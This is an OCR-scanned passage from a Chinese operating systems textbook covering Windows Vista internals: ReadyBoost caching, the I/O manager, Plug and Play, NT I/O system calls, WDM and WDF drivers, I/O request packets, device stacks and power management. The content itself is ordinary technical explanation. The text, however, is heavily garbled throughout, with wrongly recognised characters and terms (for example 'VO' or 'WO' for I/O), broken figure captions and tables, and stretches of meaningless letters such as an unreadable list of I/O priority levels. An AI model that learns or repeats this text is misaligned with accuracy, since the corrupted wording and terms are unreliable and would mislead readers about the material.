的 内 核 虚 拟 地 址 可 用 。 高 速 缓存 管理 器 通过 映射 更 少 的 文件 来 进行 调 
整 ， 这 正 是 SQL 所 喜欢 的 。 


Windows Vista 在 系统 中 引入 了 一 种 全 新 的 、 有 别 于 高 速 缓存 管 理 
右 的 缓存 技术 ， 称 为 ReadyBoost。 用 户 可 以 在 USB 接 口 或 其 他 端口 插 
入 闪存， 并 命令 操作 系统 使 用 闪存 作为 一 个 通 写 缓存 。 内 存 引 入 了 一 


种 新 的 存储 层次 ， 这 对 于 增加 人 磁盘 读 缓存 的 数量 特别 有 用 。 虽 然 比 不 
上 作为 普通 内 存 的 动态 RAM (DRAM) ， 但 是 从 闪存 读 取 数据 还 是 相 
当 快 的 。 结 合 高 速 的 DRAM 和 相对 廉价 的 | 内存，Vista 系 统 以 少量 的 
DRAM, 使 得 不 必 开 局 机 箱 束 可 以 获得 更 高 的 性 能 。 


ReadyBoost 压 缩 数 据 (通常 为 2 倍 ) ， 并 加 密 。ReadyBoost 使 用 一 
个 过 滤 驱 动 程序 来 处 理 文件 系统 发 送 到 卷 管理 器 的 1/O 请 求 。 名 为 
ReadyBoot 的 类 似 技 术 ， 通 过 使 用 闪存 缓 存 数据 来 加 速 Windows Vista 
系统 的 启动 时 间 。 但 是 这 些 技术 对 拥有 1GB 或 更 多 内 存 的 系统 影响 较 
小 。 在 只 有 512MB 内 存 的 系统 上 党 试 运行 Windows Vista 才 是 它们 真正 
有 帮助 的 地 方 。 内 存 容量 将 近 1GB 的 系统 拥有 足够 的 内 存 ， 页 面 请 求 
非常 罕见 ,使 得 磁盘 IO 能 够 满足 大 多 数 使 用 场景 。 


通 写 方式 对 闪存 被 拔除 时 减少 数据 丢失 很 重要 ， 但 未 来 的 PC 硬件 
可 能 在 主板 上 直接 集成 内 存 。 这 样 ， 内 存 不 用 通 写 方式 也 可 以 使 用 ， 
从 而 绥 存 系统 故障 时 也 需要 继续 存在 的 关键 数据 ， 而 无 需 旋 转 砚 副 。 
这 不 仅 融 来 了 性 能 的 提升 ， 而 且 还 可 以 降低 能 耗 (从 而 提高 笔记 本 电 
脑 的 电池 寿命 ) ， 因 为 磁 副 旋转 少 了 。 现 在 一 些 笔记 本 电脑 一 直 在 臻 
力 于 使 用 大 量 的 内 存 来 代 蔡 机 电磁 青 。 


11.7 Windows Vista 的 输入 /输出 


Windows IO 管理 器 提供 了 灵活 的 、 可 扩展 的 基础 框架 ， 以 便 有 效 
地 管理 非常 广泛 的 MO 设备 和 服务 ， 文 持 目 动 的 设备 识别 和 驱动 程序 安 
装 〈 即 播 即 用 ) 及 用 于 设备 和 CPU 的 电源 管理 一 一 以 上 均 基 于 异步 结 
构 使 得 计算 可 以 与 VO 传输 重 营 。 大 约 有 数 以 十 万 计 的 设备 在 Windows 
Vista 上 工作 。 一 大 批 常用 设备 甚至 不 需要 安装 驱动 程序 ， 因 为 
Windows 操 作 系 统 已 附带 其 驱动 程序 。 但 即使 如 此 ， 考 虑 到 所 有 的 版 
本 ， 也 有 将 近 100 万 种 不 同 的 驱动 程序 在 Windows Vista 上 运行 。 以 下 
各 节 中 ， 我 们 将 探讨 一 些 VO 相 关 的 问题 。 


11.7.1 基本 概念 


IO 管理 器 与 即 插 即 用 管理 器 紧密 联系 。 即 插 即 用 背后 的 基本 思想 
是 一 条 可 枚 举 总 线 。 许 多 总 线 的 设计 ， 包 括 PC 卡 、PCI、PCI-x、 
AGP、USB、IEEE 1394、EIDE 和 SATA， 都 支持 即 插 即 用 管理 器 向 每 
个 插 模 发 送 请 求 ， 并 要 求 每 个 插 权 上 的 设备 表明 身份 。 即 插 即 用 管理 
器 发 现 设备 的 存在 以 后 ， 就 为 其 分 配 便 件 资源 ， 如 中 断 等 级 ， 找 到 适 
当 的 驱动 程序 ， 并 加 载 到 内 存 中 。 每 个 驱动 程序 加 载 时 ， 就 为 其 创建 
一 个 驱动 程序 对 象 (driver object) 。 每 个 设备 至 少 分 配 一 个 设备 对 
象 。 对 于 一 些 总 线 ， 如 SCSI， 枚 举 只 发 生 在 局 动 时 间 ， 但 对 于 其 他 总 
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总 线 张 动 程序 \ 确 实在 枚 举 的 总 线 ) ， 和 IO 管理 器 之 间 的 密切 协作 。 


在 Windows 中 ， 所 有 与 硬件 无 关 的 程序 ， 如 文件 系统 、 反 病毒 过 
滤 郁 、 眷 管理 器、 网 络 协议 栈 ， 甚 至 内 核 服务 ， 都 站 用 IO 张 动 程序 来 
实现 的 。 系 统 配置 必须 设置 成 能 够 加 载 这 些 驱 动 程序 ， 因 为 在 总 线 上 
不 存在 可 枚 举 相 关 的 设备 。 其 他 如 文件 系统 ， 在 需要 时 由 特殊 代码 加 
载 ， 例 如 文件 系统 识别 郁 查 看 裸 卷 ， 以 及 辨别 文件 系统 格式 的 时 候 。 


Windows 的 一 个 有 趣 的 特点 是 文 持 动态 磁盘 (dynamic disk) 。 这 
些 磁 青 可 以 跨越 多 个 分 区 ， 或 多 个 磁盘 ， 甚 至 无 需 重 痢 局 动 在 使 用 中 
忠 可 以 重新 配置 。 通 过 这 种 方式 ， 逻 辑 卷 不 再 被 限制 在 一 个 单一 的 分 
区 或 磁盘 内 ， 一 个 单一 的 文件 系统 也 可 以 透明 地 路 越 多 个 驱 动 右 。 


从 WO 到 卷 可 被 一 个 特殊 的 Windows 驱 动 程序 过 小 产生 卷 阴 影 副本 
(Volume Shadow Copies) 。 过 滤 驱 动 程序 创建 一 个 可 单独 挂 载 的 ， 
并 代表 某 一 特定 时 间 点 的 卷 快 照 。 为 此 ， 它 会 跟 路 快照 点 后 的 变化 。 
这 对 恢复 被 意外 删除 的 文件 或 根据 定期 生成 的 卷 快照 查看 文件 过 去 的 
状态 非常 方便 。 


阴影 副本 对 精确 备份 服务 器 系统 也 很 有 价值 。 在 该 系统 上 运行 服 
务 器 应 用 程序 ， 它 们 可 以 在 合适 的 时 机 制作 一 个 干净 的 持久 备份 。 一 
旦 所 有 的 应 用 程序 准备 束 绪 ， 系 统 初始 化 卷 快照 ， 然 后 通知 应 用 程序 


继续 执行 。 备 份 由 卷 快照 组 成 。 这 与 备份 期 间 不 得 不 脱 机 相 比 ， 应 用 
程序 只 是 被 阻塞 了 很 短 的 时 间 。 


应 用 程序 参与 快照 过 程 ， 因 此 一 旦 发 生 故 障 ， 备 份 反 映 的 是 一 个 
非常 易于 恢复 的 状态 。 否 则 ， 殊 算 备 份 仍 然 有 用 ， 但 抓 取 的 状态 将 更 
像 是 系统 骨 演 时 的 状态 。 而 从 朋 江 点 恢复 系统 更 加 困难 ， 甚 至 十 不 可 
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说 ， 故 障 最 有 可 能 在 最 坏 的 时 候 发 生 ， 也 就 是 说 ， 故 障 可 能 在 应 用 程 
序 的 数据 正 处 于 不 可 恢复 的 状态 时 发 生 。 


另 一 方面 ，Windows 支 持 异 步 JO。 一 个 线程 启动 一 个 UO 操 作 ， 然 
后 与 该 IO 操作 并 行 执行 。 这 项 功能 对 服务 器 来 说 特别 重要 。 有 各 种 不 
同 的 方法 使 线程 可 以 发 现 该 O 操 作 是 否 已 经 完成 。 一 是 启动 IO 操作 
的 同时 指定 一 个 事件 对 象 ， 然 后 等 竺 它 结束 。 另 一 种 方法 是 指定 一 个 
队列 ， 当 LO 操作 完成 时 ， 系 统 将 一 个 完成 事件 插入 到 队列 中 。 三 是 提 
供 一 个 回调 函数 ，LIO 损 作 完成 时 供 系统 调用 。 四 是 在 内 存 中 开辟 一 块 
区 域 ， 当 IO 操作 完成 时 由 IO 管理 器 更 新 该 区 域 。 


我 们 要 讨论 的 最 后 一 个 方面 ， 征 由 Windows Vista 提 出 的 WO 优先 
级 。1/O 优 先 级 是 由 发 起 VO 操作 的 线程 来 确定 的 ， 或 者 也 可 以 明确 指 
定 。 共 有 5 个 优先 级 别 ， 分 别 是 ， KE > ta > IER > KR» AP ATIN c KEE 
级 别 为 内 存 管理 夷 预 留 ， 以 避免 系统 经 历 极端 内 存 压力 时 出 现 死 锁 现 
象 。 低 和 非常 低 的 优先 级 为 后 全 进程 所 使 用 ， 例 如 磁盘 碎片 整理 服 
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的 优先 级 是 正常 级 别 ， 但 是 为 避免 小 故障 ， 多 媒体 应 用 程序 也 可 标记 
它们 的 IO 优 移 级 为 高 。 多 媒体 应 用 可 有 选择 地 使 用 融 宽 预 留 模式 获得 
带 视 保证 以 访问 时 间 敏 感 的 文件 ， 如 音乐 或 视频 。IO 系 统 将 给 应 用 程 
序 提供 最 优 的 传输 大 小 和 显 式 MO 操 作 的 数目 ， 从 而 维持 应 用 程序 向 

IO 系统 请 求 的 带宽 保证 。 


11.7.2 输入 /输出 API 调 用 


由 IO 管理 器 提供 的 API 与 大 多 数 操作 系统 提供 的 API 并 没有 很 大 的 
不 同 。 基 本 操作 有 open、read、write、ioctl] 和 close， 以 及 即 插 即 用 和 电 
源 操 作 、 参 数 设 置 、 刷 新 系统 缓冲 区 等 。 在 Win32 层 ， 这 些 API 被 包装 
成 接口 ， 向 特定 的 设备 提供 了 更 高 一 级 的 操作 。 在 底层 ， 这 些 API 打 开 
设备 ， 并 执行 这 些 基 本 类 型 的 操作 。 即 使 是 对 一 些 元 数据 的 操作 ， 如 
重 命名 文件 ， 也 没有 用 专门 的 系统 调用 来 实现 。 它 们 只 是 特殊 的 ioctl 操 
作 。 在 我 们 解释 了 IO 设备 栈 和 IO 管理 器 使 用 的 IO 请 求 包 (RP) 之 
后 ， 读 者 将 对 上 面 的 陈述 更 有 体会 。 


保持 了 Windows 一 贯 的 通用 哲学 ， 原 生 NT IO 系统 调用 带 有 很 多 参 
数 并 包括 很 多 变种 。 图 11-37 列 出 了 IO 管理 器 中 主要 的 系统 调用 接口 。 
NtCreateFile 用 于 打开 已 经 存在 的 或 者 新 的 文件 。 它 为 新 创建 的 文件 提 
供 了 安全 描述 符 和 一 个 对 被 请 求 的 访问 权限 的 详细 描述 ， 并 使 得 新 文 
件 的 创建 者 拥有 了 一 些 如 何 分 配 磁盘 块 的 控制 权 。NtReadFile 和 
NtWriteFile 需 要 文件 句柄 、 缓 冲 区 和 长 度 等 参数 。 它 们 也 需要 一 个 明确 
的 文件 偏 移 量 的 参数 ， 并 且 人 允许 指定 一 个 用 于 访问 文件 锁定 区 域 字 节 
的 钥匙 。 正 如 上 面 提 到 的 ， 大 部 分 的 参数 都 和 指定 哪 一 个 函数 来 报告 
(很 可 能 是 异步 ) VO 操 作 的 完成 有 关 。 


打开 一 个 新 的 或 已 存在 的 文件 或 设备 
从 一 个 文件 或 设备 上 读 取 数据 

把 数据 写 到 一 个 文件 或 设备 

请 求 关 于 一 个 目录 的 信息 ， 包 括 文件 

请 求 关于 一 个 卷 的 信息 

当 任何 在 此 目录 中 或 其 子 目录 树 中 的 文件 被 修改 时 执行 完成 
请 求 关于 一 个 文件 的 信息 

修改 文件 信息 

给 文件 中 一 个 区 域 加 锁 

AT 

对 一 个 文件 进行 多 种 操作 

把 内 存 文件 缓冲 刷新 到 磁盘 

取消 文件 上 未 完成 的 MO 操 作 

对 一 个 设备 的 特殊 操作 


图 11-37 执行 WO 的 原生 NT API 调 用 


WO 系统 调用 


NtQuerydirectoryFile 是 一 个 在 执行 过 程 中 访问 或 修改 指定 类 型 对 象 
言 息 的 标准 模式 的 一 个 例子 ， 在 这 种 模式 中 存在 多 种 不 同 的 查询 API。 
在 本 例 中 ， 指 定 类 型 的 对 象 是 指 与 某 些 目 孙 相关 的 一 些 文件 对 象 。 一 
个 参数 用 于 指定 请 求 什 么 类 型 的 信息 ， 比 如 目录 中 的 文件 名 列表 ， 或 
者 是 经 过 扩展 的 目录 列表 所 需要 的 每 个 文件 的 详细 信息 。 由 于 它 实际 
上 是 一 个 WO 操作 ， 因 此 它 支 持 所 有 的 报告 /O 操 作 已 完成 的 标准 方法 。 
NtQueryVolumeInformationFile 很 像 是 目录 查询 操作 ， 但 是 与 目录 查询 
操作 不 同 的 是 ， 它 有 一 个 参数 是 打开 的 卷 的 文件 句柄 ， 不 管 这 个 卷 上 
是 否 有 文件 系统 。 与 目录 不 同 的 是 ， 卷 上 有 一 些 参数 可 以 修改 ， 因 此 
这 里 有 了 单独 用 于 卷 的 API NtSetVolumelnformationFile ° 


NtNotifyChangeDirectoryFile 是 一 个 有 趣 的 NT 范式 的 例子 。 线 程 可 
以 通过 IO 操作 来 确定 对 象 是 否 发 生 了 改变 (对 和 象 主要 是 文件 系统 的 目 
录 ， 就 像 在 此 例 中 ;也 可 能 是 注册 表 键 ) 。 因 为 IO 操作 是 异步 的 ， 所 
以 线程 在 调用 IO 操作 后 会 立即 返回 并 继续 执行 ， 并 且 只 有 在 修改 对 象 
之 后 线程 才 会 得 到 通知 。 未 处 理 的 请 求 作为 一 个 外 部 的 /OO 操作， 使 用 
一 个 VO 请 求 包 (IRP) 被 加 入 到 文件 系统 的 队列 中 等 待 。 如 果 想 从 系 
统 移 除 一 个 文件 系统 卷 ， 给 执行 过 未 处 理 VO 操 作 的 线程 的 通知 就 会 出 
问题 ， 因 为 那些 VO 操作 正在 等 每 。 因 此 ，Windows 提 供 了 取消 未 处 理 
IO 操作 的 功能 ， 其 中 包括 文 持 文 件 系统 强行 卸载 有 未 处 理 MO 操 作 的 卷 
的 功能 。 


NtQueryInformationFile 是 一 个 用 于 查询 目录 中 指定 文件 的 信息 的 系 
统 调用 。 还 有 一 个 与 它 相 对 应 的 系统 调用 : NtSetInformationFile。 这 些 
接口 用 于 访问 和 修改 文件 的 各 种 相关 信息 ， 如 文件 名 ， 类 似 于 加 密 、 
压缩 、 稀 芷 等 文件 特征 ， 其 他 文件 属性 和 详细 人 资料， 包括 查 询 内 部 文 
件 ID 或 给 文件 分 配 一 个 唯一 的 二 进 制 名 称 〈 对 象 ID) 。 


这 些 系统 调用 本 质 上 有 是 特定 于 文件 的 ioctl 的 一 种 形式 。 这 组 操作 可 
以 用 来 重 命名 或 删除 一 个 文件 。 但 是 请 注意 ， 它 们 处 理 的 并 不 是 文件 
名， 所 以 要 重 命名 或 删除 一 个 文件 之 前 必须 先 打开 这 个 文件 。 它 们 也 
可 以 被 用 来 重新 命名 NTFS 上 的 交换 数据 流 〈 见 11.8T) 。 


存在 独立 的 API (NtLockFile 和 NtUnlockFile) 用 来 设置 和 删除 文件 
中 字 节 域 的 锁 。 通 过 使 用 共享 模式 ，NtCreateFile 允 许 访问 被 限制 的 整 
个 文件 。 男 一 种 是 这 些 锁 API， 它 们 用 来 强制 访问 文件 中 受 限制 的 字 节 
域 。 读 操作 和 写 操作 必须 提供 一 个 与 提供 给 NtLockFile 的 钥 瑟 相符 合 的 
密 钥 ， 以 便 操 作 被 锁定 的 区 域 。 


UNIX 中 也 有 类 似 的 功能 ， 但 在 UNIX 中 应 用 程序 可 以 自由 决定 是 
否认 同 这 个 区 域 锁 。NtFsControlFile 和 前 面 提 到 的 查询 和 设置 操作 很 相 
像 ， 但 它 是 一 个 则 在 处 理 特定 文件 的 操作 ， 其 他 的 API 并 不 适合 处 理 这 
种 文件 。 例 如 ， 有 些 操 作 只 针对 特定 的 文件 系统 。 


最 后 ， 还 有 一 些 其 他 的 系统 调用 ， 比 如 NtFlushBuffersFile。 像 
UNIX 的 sync 系 统 调 用 一 样 ， 它 强制 把 文件 系统 数据 写 回 到 和 磁盘。 
NtCancelIoFile 用 于 取消 对 一 个 特定 文件 的 外 部 MO 请 求 ， 
NtDeviceloControlFile 实 现 了 对 设备 的 ioctl 操 作 。 它 的 操作 清单 实际 上 
比 ioctl 更 长 。 有 一 些 系 统 调用 用 于 按 文 件 名 删除 文件 ， 并 查询 特定 文件 
的 属性 一 一 但 这 些 操作 只 是 由 上 面 列 出 的 其 他 IO 管理 器 操作 包装 而 成 
的 。 在 这 里 ， 我 们 虽然 列 出 ， 但 并 不 是 真 的 要 把 它们 实现 成 独立 的 系 
统 调用 。 还 有 一 些 用 于 处 理 VO 完 成 端口 的 系统 调用 ，Windows 的 队列 
功能 帮助 多 线程 服务 器 提高 使 用 异步 1/O 操 作 的 效率 ， 主 要 通过 按 需 准 
备 线程 并 降低 在 专用 线程 上 服务 WO 所 需要 的 上 下 文 切换 数目 来 实现 。 


11.7.3 ”IO 实现 


Windows IO 系统 由 即 插 即 用 服务 、 电 源 管 理 右 、IO 管 理 釉 和 设备 
驱动 模型 组 成 。 即 插 即 用 服务 检测 人 硬件 配置 上 的 改变 并 且 为 每 个 设备 
创建 或 拆 印 设备 栈 ， 也 会 引起 设备 驱动 程序 的 装载 和 凶 载 。 功 耗 管 理 
器 会 调节 IO 设备 的 功 耗 状态 ， 以 在 设备 不 用 的 时 候 降 低 系统 功 耗 。IO 
管理 器 为 管理 MO 内 核对 象 以 及 如 IoCallDrivers 和 loCompleteRequest 等 基 
于 IRP 的 操作 提供 支持 。 但 是 ， 文 持 Windows IO 所 需要 的 大 部 分 工作 
都 由 设备 驱动 程序 本 身 实现 。 


1. 设 备 驱 动 程序 


为 了 确保 设备 驱动 程序 能 和 Windows Vista 的 其 余部 分 协同 工作 ， 
微软 公司 定义 了 设备 驱动 程序 需要 符合 的 WDM 《Windows 张 动 程序 模 
KI) 。WDM 被 设计 成 能 在 Windows 98 系 统 上 运行 ， 也 能 在 从 Windows 
2000 开 始 的 基于 NI 的 系统 上 运行 。WDM 人 允许 开发 人 员 编写 与 两 类 系 
统 都 兼容 的 驱动 程序 。 微 软 公司 还 提供 了 一 个 用 于 帮助 驱动 程序 开发 
人 员 编 写 符 合 模型 的 驱动 程序 的 开发 工具 箱 (Windows 驱 动 程序 开发 工 
具 箱 ) 。 大 部 分 Windows 驱 动 程序 的 开发 过 程 都 是 先 复制 一 份 合适 的 简 
单 的 驱动 程序 ， 然 后 修改 它 。 


微软 公司 也 提供 一 个 驱动 程序 验证 器 ， 用 以 验证 驱动 程序 的 多 个 
行为 以 确保 驱动 程序 符合 Windows 驱 动 程序 模型 的 结构 要 求 和 IO 请 求 
的 协议 要 求 、 内 存 管 理 等 。 操 作 系统 中 带 有 此 验证 器 ， 管 理 员 可 能 通 
过 运行 verifier.exe 来 控制 驱动 程序 验证 器 ， 验 证 器 允许 管理 员 配 置 要 验 
证 哪些 驱动 程序 以 及 在 怎样 的 范围 (多 少 资源 ) 内 验证 这 些 驱 动 程 
序 。 


即使 有 所 有 的 驱动 程序 开发 和 验证 支持 ， 在 Windows 中 写 一 个 简单 
的 驱动 程序 仍然 是 非常 困难 的 事情 ， 因 此 微软 建立 了 一 个 叫做 WDF 
(Windows 驱 动 程序 基础 的 包装 系统 ， 它 运行 在 WDM 顶 层 ， 简 化 了 
很 多 更 普通 的 需求 ， 主 要 和 驱动 程序 与 电源 管理 和 即 插 即 用 操作 之 间 
的 正确 交互 有 关 。 


为 了 进一步 简化 编写 驱动 程序 ， 也 为 了 提高 了 系统 的 健壮 性 ， 
WDF 包 含 UMDF (用 户 模式 驱动 程序 如 构 ) ， 使 用 UMDF 编 写 的 驱动 
程序 作为 在 进程 中 执行 的 服务 。 还 有 KMDF (内 核 模式 驱动 程序 架 
构 ) ， 使 用 KMDF 编 写 的 驱动 程序 作为 在 内 核 中 执行 的 服务 ， 但 是 也 
使 得 WDM 中 的 很 多 细节 变 得 不 可 预料 。 由 于 底层 是 WDM， 并 且 WDM 
提供 了 驱动 程序 模型 ， 因 此 ， 本 节 将 主要 关注 WDM 。 


在 Windows 中 ， 设 备 是 由 设备 对 象 描述 的 。 设 备 对 象 也 用 于 描述 硬 
件 (例如 总 线 ) ， 软 件 抽象 《例如 文件 系统 、 网 络 协议 ) ， 还 可 以 描 


述 内 核 扩 展 (例如 病毒 过 滤器 驱动 程序 。 上 面 提 到 的 这 些 设 备 对 象 
都 是 由 Windows 中 的 设备 栈 来 组 织 的 ， 见 前 面 的 图 11-16。 


IO 操作 从 IO 管理 器 调用 可 执行 API IoCallDriver 程 序 开始 ， 
IoCallDriver 带 有 指向 顶层 设备 对 象 和 描述 MO 请 求 的 IRP 的 指针 。 这 个 
例 程 可 以 找到 与 设备 对 象 联合 在 一 起 的 驱动 程序 。 在 IRP 中 指定 操作 类 
型 通常 都 符合 前 面 讲 过 的 IO 管理 器 系统 调用 ， 例 如 创建 、 读 取 和 关 
闭 。 


图 11-38 表 示 的 是 一 个 设备 栈 在 单独 一 层 上 的 关系 。 张 动 程序 必须 
为 每 个 操作 指定 一 个 进入 点 。IoCallDriver 从 IRP 中 获取 操作 类 型 ， 利 用 
在 当前 级 别 的 设备 栈 中 的 设备 对 象 来 查找 指定 的 驱动 程序 对 象 ， 并 且 
根据 操作 类 型 索引 到 驱动 程序 分 派 表 去 查找 相应 驱动 程序 的 进入 点 。 
最 后 会 把 设备 对 象 和 IRP 传 递 给 驱动 程序 并 调用 它 。 


设备 对 象 加 载 的 设备 驱动 程序 


驱动 程序 代码 


驱动 程序 对 象 


Al 11-38 设备 栈 中 的 单独 一 层 


一 旦 驱动 程序 完成 处 理 IRP 描 述 的 请 求 后 ， 它 将 有 三 种 选择 。 第 
一 ， 驱 动 程序 可 以 再 一 次 调用 IoCallDriver， 把 IRP 和 设备 栈 中 的 下 一 个 
设备 对 象 传递 给 相应 的 驱动 程序 。 第 二 ， 驱 动 程序 也 可 以 声明 LO 请 求 
已 经 完成 并 返回 到 调用 者 。 第 三 ， 驱 动 程序 还 可 以 在 内 部 对 IRP 排 队 并 
返回 到 调用 者 ， 同 时 声明 WO 请 求 仍 未 人 处理。 后 一 种 情况 下 ， 如 果 栈 上 
的 所 有 驱动 都 认可 挂 起 行为 且 返 回 各 自 的 调用 者 ， 则 会 引起 一 次 异步 
IO 操作 。 


2.IO 请 求 包 


图 11-39 表 示 的 是 IRP 中 的 主要 的 域 。IRP 的 发 部 是 一 个 动态 大 小 的 
数组 ， 包 含 那 些 被 设备 栈 管理 请 求 的 域 ， 每 个 驱动 程序 都 可 以 使 用 这 
些 域 。 在 完成 一 次 WO 请 求 的 时 候 ， 这 些 设备 栈 的 域 也 允许 驱动 程序 指 
定 要 调用 哪个 例 程 。 在 完成 请 求 的 过 程 中 ， 按 倒序 访问 设备 栈 的 每 一 
级 ， 并 且 依 次 调用 由 每 个 应 用 程序 指定 的 完成 例 程 。 在 每 一 级 ， 张 动 
程序 可 以 继续 执行 以 完成 请 求 ， 也 可 以 因为 还 有 更 多 的 工作 要 做 从 而 
决定 让 请 求 处 于 未 处 理 状态 并 且 和 暂停 WO 的 完成 。 


内 存 缓冲 区 地 址 


用 户 缓冲 区 地 址 


操作 代码 


缓冲 区 指针 
内 存 描述 表 头 


内 存 描述 符 表 下 一 个 IRP 


内 存 描 述 符 表 线程 IRP 链 接 


完成 或 取消 信息 


完成 异 步 过 iZ EE z g 
程 调用 块 


oe ee o o- eee ee 


Al 11-39 IO 请 求 包 的 主要 域 


当 WO 管 理 絮 分 配 一 个 IRP 时 ， 为 了 分 派 一 个 足够 大 的 IRP， 它 必须 
知道 这 个 设备 栈 的 深度 。 在 建立 设备 栈 的 时 候 ，LIO 管 理 需 会 在 每 一 个 
设备 对 象 的 域 中 记录 栈 的 深度 。 注 意 ， 在 任何 栈 中 都 没有 正式 地 定义 
下 一 个 设备 对 象 是 什么 。 这 个 信息 被 保存 在 栈 中 当前 张 动 程序 的 私有 
数据 结构 中 。 事 实 上 这 个 栈 实际 上 并 不 一 定 是 一 个 真正 的 栈 。 在 每 一 
层 栈 中 ， 驱 动 程序 都 可 以 自由 地 分 配 新 的 IRP， 或 者 继续 使 用 原来 的 
IRP， 或 者 发 送 一 个 W/O 操作 给 男 一 个 设备 栈 ， 或 者 甚至 转换 到 一 个 系 
统 工作 线程 中 继续 执行 。 


IRP 包 含 标志 位 、 索 引 到 驱动 程序 分 派 表 的 操作 码 、 指 向 内 核 与 用 
户 缓冲 区 的 指针 和 一 个 MDL (内 存 描述 符 列 表 ) 列表 。MDL 用 于 描述 


HRX He A BAY EE, tte TDMA © APE TEX 
消 和 完成 操作 。 当 1O 操 作 已 经 完成 后 ， 在 处 理 IRP 时 用 于 排列 这 个 IRP 
到 设备 中 的 域 会 被 重用 。 目 的 是 给 用 于 在 原始 线程 的 上 下 文中 调用 IO 
管理 天 的 完成 例 程 的 APC 探 制 对 象 提供 内 存 。 还 有 一 个 连接 域 用 于 连 
接 所 有 的 外 部 IRP 到 初始 化 它们 的 线程 。 


3. 设 备 栈 (Device Stack) 


Windows Vista 中 的 驱动 程序 可 以 自己 完成 所 有 的 任务 ， 如 图 11-40 
所 示 的 打印 机 驱动 程序 。 男 一 方面 ， 驱 动 程序 也 可 以 堆 生 起 来 ， 即 一 
个 请 求 可 以 在 一 组 驱动 程序 之 间 传 递 ， 每 个 驱动 程序 完成 一 部 分 工 
作 。 图 11-40 也 给 出 了 两 个 堆 受 的 驱动 程序 。 


用 户 进程 


图 11-40 ”Windows 人 允许 驱动 程序 堆 熏 起 来 操作 设备 。 这 种 堆 营 是 通 
过 设备 对 象 (Device Object) 来 表示 的 


堆 谷 驱动 程序 的 一 个 常见 用 途 是 将 总 线 管理 与 控制 设备 的 功能 性 
工作 分 离 。 因 为 要 考虑 多 种 模式 和 总 线 事务 ，PCI 总 线 上 的 总 线 管理 相 


当 复 杂 。 通 过 将 这 部 分 工作 与 特定 于 设备 的 部 分 分 离 ， 驱 动 程序 开发 
人 员 就 可 以 从 学 习 如 何 控 制 总 线 中 解脱 出 来 了 。 他 们 只 要 在 驱动 栈 中 
使 用 标准 总 线 驱 动 程序 就 可 以 了 。 类 似 地 ，USB 和 SCSI 驱 动 程序 都 有 
一 个 特定 于 设备 的 部 分 和 一 个 通用 部 分 。Windows 为 其 中 的 通用 部 分 提 
供 了 公共 的 驱动 程序 。 


堆 稚 设备 驱动 程序 的 男 一 个 用 途 古 将 过 滤 絮 驱动 程序 (filter 
driver) 插入 到 驱动 栈 中 。 我 们 已 经 讨论 过 文件 系统 过 滤器 驱动 程序 的 
使 用 了 ， 该 驱动 程序 插入 到 文件 系统 之 上 。 过 滤器 驱动 程序 也 用 于 管 
理 物理 硬件 。 在 IRP 沿 着 设备 栈 (Device Stack) 向 下 传递 的 过 程 中 ， 以 
及 在 完成 操作 (completion operation) 中 IRP 沿 着 设备 栈 中 各 个 设备 驱 
动 程序 指定 的 完成 例 程 (completion routine) 向 上 传递 的 过 程 中 ， 过 滤 
器 驱动 程序 会 对 所 要 进行 的 操作 进行 变换 。 例 如 ， 一 个 过 滤器 驱动 程 
序 能 够 在 将 数据 存放 到 磁盘 上 时 对 数据 进行 压缩 ， 或 者 在 网 络 传 输 前 
对 数据 进行 加 密 。 将 过 滤器 放 在 这 里 意味 着 应 用 程序 和 真正 的 设备 驱 
动 程序 都 不 必 知 道 过 滤器 的 存在 ， 而 过 滤器 会 目 动 对 进出 设备 的 数据 
UTOE? 


内 核 态 设备 驱动 程序 是 影响 Windows 的 可 靠 性 和 稳定 性 的 严重 问 
题 。Windows 中 大 多 数 内 核 朋 涡 都 是 由 设备 驱动 程序 出 错 造成 的 。 因 为 
内 核 态 设备 驱动 程序 与 内 核 及 执行 层 使 用 相同 的 地 址 空间 ， 张 动 程序 
中 的 错误 可 能 破坏 内 核 数据 结构 ， 甚 至 更 糟 。 其 中 的 有 些 错误 之 所 以 


产生 ， 部 分 原因 是 为 Windows 编 写 的 设备 驱动 程序 的 数量 极其 上 庞大， 部 
分 原因 是 设备 驱动 程序 由 缺乏 经 验 的 开发 者 编写 。 当然， 为 了 编写 一 
个 正确 的 驱动 程序 而 涉及 的 大 量 设备 细 市 也 古 造 成 驱动 程序 错误 的 原 
因 。 


IO 模型 是 强大 而 且 灵 活 的 ， 但 是 几乎 所 有 的 IO 都 是 异步 的 ， 因 此 
系统 中 会 大 量 存 在 竞 态 条 件 (race condition) 。 从 Win9x 系 统 到 基于 NT 
技术 的 Windows 系 统 ，Windows 2000 首 次 增加 了 即 插 即 用 (的 功能 ) 和 
电源 管理 设施 。 这 对 要 正确 地 操纵 在 处 理 UO 包 过 程 中 涉及 的 驱动 器 的 
驱动 程序 提出 了 很 多 要 求 。PC 机 用 户 常常 插 上 / 拔 掉 设备 ， 把 笔记 本 电 
脑 合 上 盖子 装 入 公文 包 ， 而 通常 不 考虑 设备 上 那个 小 绿灯 是 否 仍然 亮 
着 (表示 设备 正在 与 系统 交互 ) 。 编 写 在 这 样 的 环境 下 能 够 正确 运行 
的 设备 驱动 程序 是 非常 具有 挑战 性 的 ， 这 也 是 开发 WDF (Windows 
Driver Foundation) 以 简化 Windows 驱 动 模型 的 原因 。 


电源 管理 如 集 中 管理 整个 系统 的 电源 使 用 。 早 期 的 电源 管理 包括 
关闭 显示 融和 停止 磁盘 旋转 以 降低 电源 消耗 。 但 是 ， 我 们 需要 延长 笔 
记 本 电脑 在 电池 供电 情况 下 的 使 用 时 间 。 我 们 还 会 涉及 长 时 间 无 人 看 
管 运行 的 介面 计算 机 的 电源 市 约 ， 以 及 市 省 为 现今 存在 的 巨大 的 服务 
器 群 提供 能 源 的 昂 贯 花费 〈 像 微软 、Google 这 样 的 公司 将 服务 器 群 建 
在 水 电站 附近 以 降低 费用 ) 。 当 我 们 面临 以 上 问题 时 ， 情 况 迅 速 变 得 
复杂 起 来 。 


更 新 一 些 的 电源 管理 设施 可 以 在 系统 没有 被 使 用 的 时 候 ， 通 过 切 
换 设备 到 后 备 状态 甚至 通过 使 用 软 电源 开关 (soft power switch) 将 设 
备 完 全 关闭 来 降低 部 件 功 耗 。 在 多 处 理 右 中 ， 可 以 通过 关闭 不 需要 的 
CPU 和 降低 正在 运行 的 CPU 的 频率 来 减少 功 耗 。 当 一 个 处 理 磺 空 采 的 
时 候 ， 由 于 除了 等 竺 中断 发 生 之 外 ， 该 处 理 器 不 需要 做 任何 事情 ， 它 
的 功 耗 也 相应 减少 了 。 


